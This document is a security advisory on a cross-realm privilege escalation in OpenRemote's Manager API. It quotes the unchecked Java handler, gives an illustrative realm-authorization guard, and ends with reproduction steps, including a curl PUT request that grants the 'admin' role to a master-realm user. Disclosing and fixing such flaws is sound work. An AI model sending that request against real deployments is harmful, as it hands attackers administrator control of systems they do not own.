A user who has write:admin in one Keycloak realm can call the Manager API to update Keycloak realm roles for users in another realm, including master. The handler uses the {realm} path segment when talking to the identity provider but does not check that the caller may administer that realm. This could result in a privilege escalation to master realm administrator if the attacker controls any user in the master realm.
In manager/src/main/java/org/openremote/manager/security/UserResourceImpl.java, there is no check to validate if the caller should be able to administer a realm they're trying to update.
@Override
public void updateUserRealmRoles(RequestParams requestParams, String realm, String userId, String[] roles) {
    try {
        identityService.getIdentityProvider().updateUserRealmRoles(
            realm,
            userId,
            roles);
    } catch (ClientErrorException ex) {
        ex.printStackTrace(System.out);
        throw new WebApplicationException(ex.getCause(), ex.getResponse().getStatus());
    } catch (Exception ex) {
        throw new WebApplicationException(ex);
    }
}
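The missing step is a realm-scoped authorization decision taken before the handler delegates to the identity provider. The guard below is an added illustration, not OpenRemote's code or its fix; the Caller record, the write:admin role string and the super-user flag are assumptions standing in for whatever the real AuthContext exposes.

```java
import java.util.Set;

final class RealmAuthorization {
    static final String MASTER = "master";

    // Hypothetical stand-in for the authenticated caller: the realm the token
    // was issued for, the client roles it carries, and whether it is the
    // master-realm super user.
    record Caller(String realm, Set<String> clientRoles, boolean superUser) {}

    // True only when the caller may administer targetRealm: a master super
    // user may administer any realm; every other caller must hold write:admin
    // AND be acting on the realm its own token belongs to. This is the check
    // the handler above skips, so the {realm} path segment alone decides.
    static boolean mayAdministerRealm(Caller caller, String targetRealm) {
        if (targetRealm == null || targetRealm.isBlank()) return false;
        if (caller.superUser() && MASTER.equals(caller.realm())) return true;
        return caller.clientRoles().contains("write:admin")
            && caller.realm().equals(targetRealm);
    }

    // Guard to run first thing in updateUserRealmRoles(); a rejection here
    // maps to a 403 at the resource layer.
    static void assertMayAdministerRealm(Caller caller, String targetRealm) {
        if (!mayAdministerRealm(caller, targetRealm)) {
            throw new SecurityException("caller in realm '" + caller.realm()
                + "' may not administer realm '" + targetRealm + "'");
        }
    }

    public static void main(String[] args) {
        // Constructed callers mirroring the advisory's scenario.
        Caller newRealmAdmin = new Caller("NEW_REALM", Set.of("write:admin"), false);
        Caller masterSuper = new Caller(MASTER, Set.of("write:admin"), true);

        // Same-realm administration stays allowed.
        System.out.println(mayAdministerRealm(newRealmAdmin, "NEW_REALM"));
        // The advisory's case: write:admin in NEW_REALM aimed at master.
        System.out.println(mayAdministerRealm(newRealmAdmin, MASTER));
        // A master super user keeps cross-realm administration.
        System.out.println(mayAdministerRealm(masterSuper, "NEW_REALM"));
        try {
            assertMayAdministerRealm(newRealmAdmin, MASTER);
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```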
Steps to reproduce:
1. Create a realm other than master. Add a user and grant that user the OpenRemote client role write:admin. Remember the realm name (call it NEW_REALM).
2. In master, pick a low-privilege user (no admin realm role). Copy that user's UUID (<master-user-uuid>).
3. Log in as the NEW_REALM user to obtain an access token (<token>) for NEW_REALM.
4. Call the Manager API with that token, with master as the target realm in the path:

curl -k -X PUT "https://<host>/api/<NEW_REALM>/user/master/userRealmRoles/<master-user-uuid>" \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
-d '["admin"]'
Version listed in the advisory metadata: 1.22.1
CVSS v3.1 base score: 7.0 (vector CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L)
Exploitability: AV:N, AC:H, PR:N, UI:N; Scope: S:U; Impact: C:L, I:H, A:L